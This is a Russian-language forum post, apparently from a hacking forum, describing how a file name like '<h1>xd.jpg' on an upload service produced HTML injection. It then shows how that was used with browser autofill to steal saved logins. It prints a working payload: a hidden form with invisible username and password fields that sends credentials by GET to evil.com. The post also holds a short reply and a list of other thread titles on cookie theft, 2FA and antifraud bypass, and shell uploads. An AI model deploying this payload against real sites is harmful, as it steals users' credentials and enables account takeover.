Don't Leave the Gates to the Wizard: Accessing Passwords via HTML Injection

BOPUEM · Feb 1, 2023

ВВЕДЕНИЕ

Современные веб-сайты используют функцию автозаполнения, чтобы упростить процесс ввода данных пользователей. Но этот полезный инструмент также может быть использован для кражи учетных данных. Функция автозаполнения позволяет пользователям сохранять их учетные данные на компьютере, что открывает дверь для взлома учетных данных. В этой статье мы рассмотрим, как мы можем использовать функцию автозаполнения для кражи учетных данных и как вы можете обезопасить себя.

HTML-ИНЪЕКЦИЯ

Каждый мой ввод на неважно каком сайте был нормально выполнен приложением и поэтому мое внимание перешло на функцию загрузки файлов. Пользователи могут загружать файлы, и после загрузки сайт даёт общедоступную ссылку, которой мы можем поделиться с другими людьми, чтобы они тоже увидели этот файл. Я пытался обойти проверку на расширение файла при загрузке: я использовал .svg, .html и .php, но у меня ничего не получилось. Но как только я переименовал файл в «<h1>xd.jpg» и открыл его по общедоступной ссылке. Из-за имени файла получилась HTML-инъекция.

Итак, теперь у нас есть HTML-инъекция, теперь можно разобраться в функции автосохранения

АВТОЗАПОЛНЕНИЕ

После сохранения учетных данных для входа в наш аккаунт, при попытке снова войти на сайт, браузер автоматически заполнит поля логина и пароля, и нам просто нужно нажать на кнопку входа.

Поэтому я решил добавить стиль opaсity:0 в CSS для полей логина и пароля в форме входа, чтобы они были невидимы.

"><form action="//evil.com" method="GET"><input type="text" name="u" style='opacity:0;'><input type="password" name="p" style='opacity:0;'><input type="submit" name="s" value="submit"><!--.jpg
Click to expand...

Теперт я могу узнать ссылку на тот самый файл, который я загрузил.

Вот как выглядит страница, когда юзер посещает публичный URL-адрес моего загруженного файла.

при нажатии кнопки submit учетные данные для входа будут переданы на сервер.

Как выглядит действие? Функция автосохранения заполняет поля ввода автоматически, а установка стиля opacity: 0; позволит скрыть элементы, которые появляются на веб-странице. При нажатии "Отправить", данные передаются автоматически на evil.com, из-за установки METHOD='GET'. Это посылает GET-запрос на домен , содержащий учетные данные для входа. Оставшийся HTML закомментируется последними символами <!-- .

Ягода · Feb 1, 2023

Такое обычно используется во всех адекватных плетежках

Free eat in Rostics

All about SQL Injections and No SQL Injections and their exploitation

We go to cookies to Roblox account on iPhone/Android

About CSRF Attack and the importance of CSRF TOKEN on your site

We occupy all places in the cinema without investments

How to get around the antifrod Google cards?

Help with pentest

The history of 2f bypass on a network of banks with a capitalization of 50V+

We find unpacked dads for our goals

Khostim Ratnik for free without opening ports and hosting

Do you have an old tunnel in Playit.gg and can not delete it? We will decide

How to *****For Cover with Dahua DVR standard

We go around the game launches (GTA, Far Cry, RDR, etc.)

How to view any video from any user in the office

We loot additional proxies

Bypassing the Social Club launcher in games (GTA IV, GTA V, RDR II, etc.)

Acquaintance with the web scanner of the vulnerabilities of Nikto and the exploitation of XSS

An example of the operation of WebSocket vulnerability (Burp Suite)

All about File Inclusion and Remote File Inclusion

Hacking games in Telegram.

Uploading a shell on vBulletin 5

We register the Yandex Account for Tempom

XSS Administrator Escalation (WP) | Elevating rights to admin | We get access without restrictions

Login to your account using Cookie using Roblox as an example

Windows Theme Spoofing CVE-2024-21320

WAF bypass. How to find out the IP of a site that uses WAF or DDoS protection

We get an account on xaker.ru without registration (without subscription)

Vulnerability in remote access software

The story of how I completely hacked wordpress sites..

RCE via plugin loading (CVE-2024-31210)

Don't Leave the Gates to the Wizard: Accessing Passwords via HTML Injection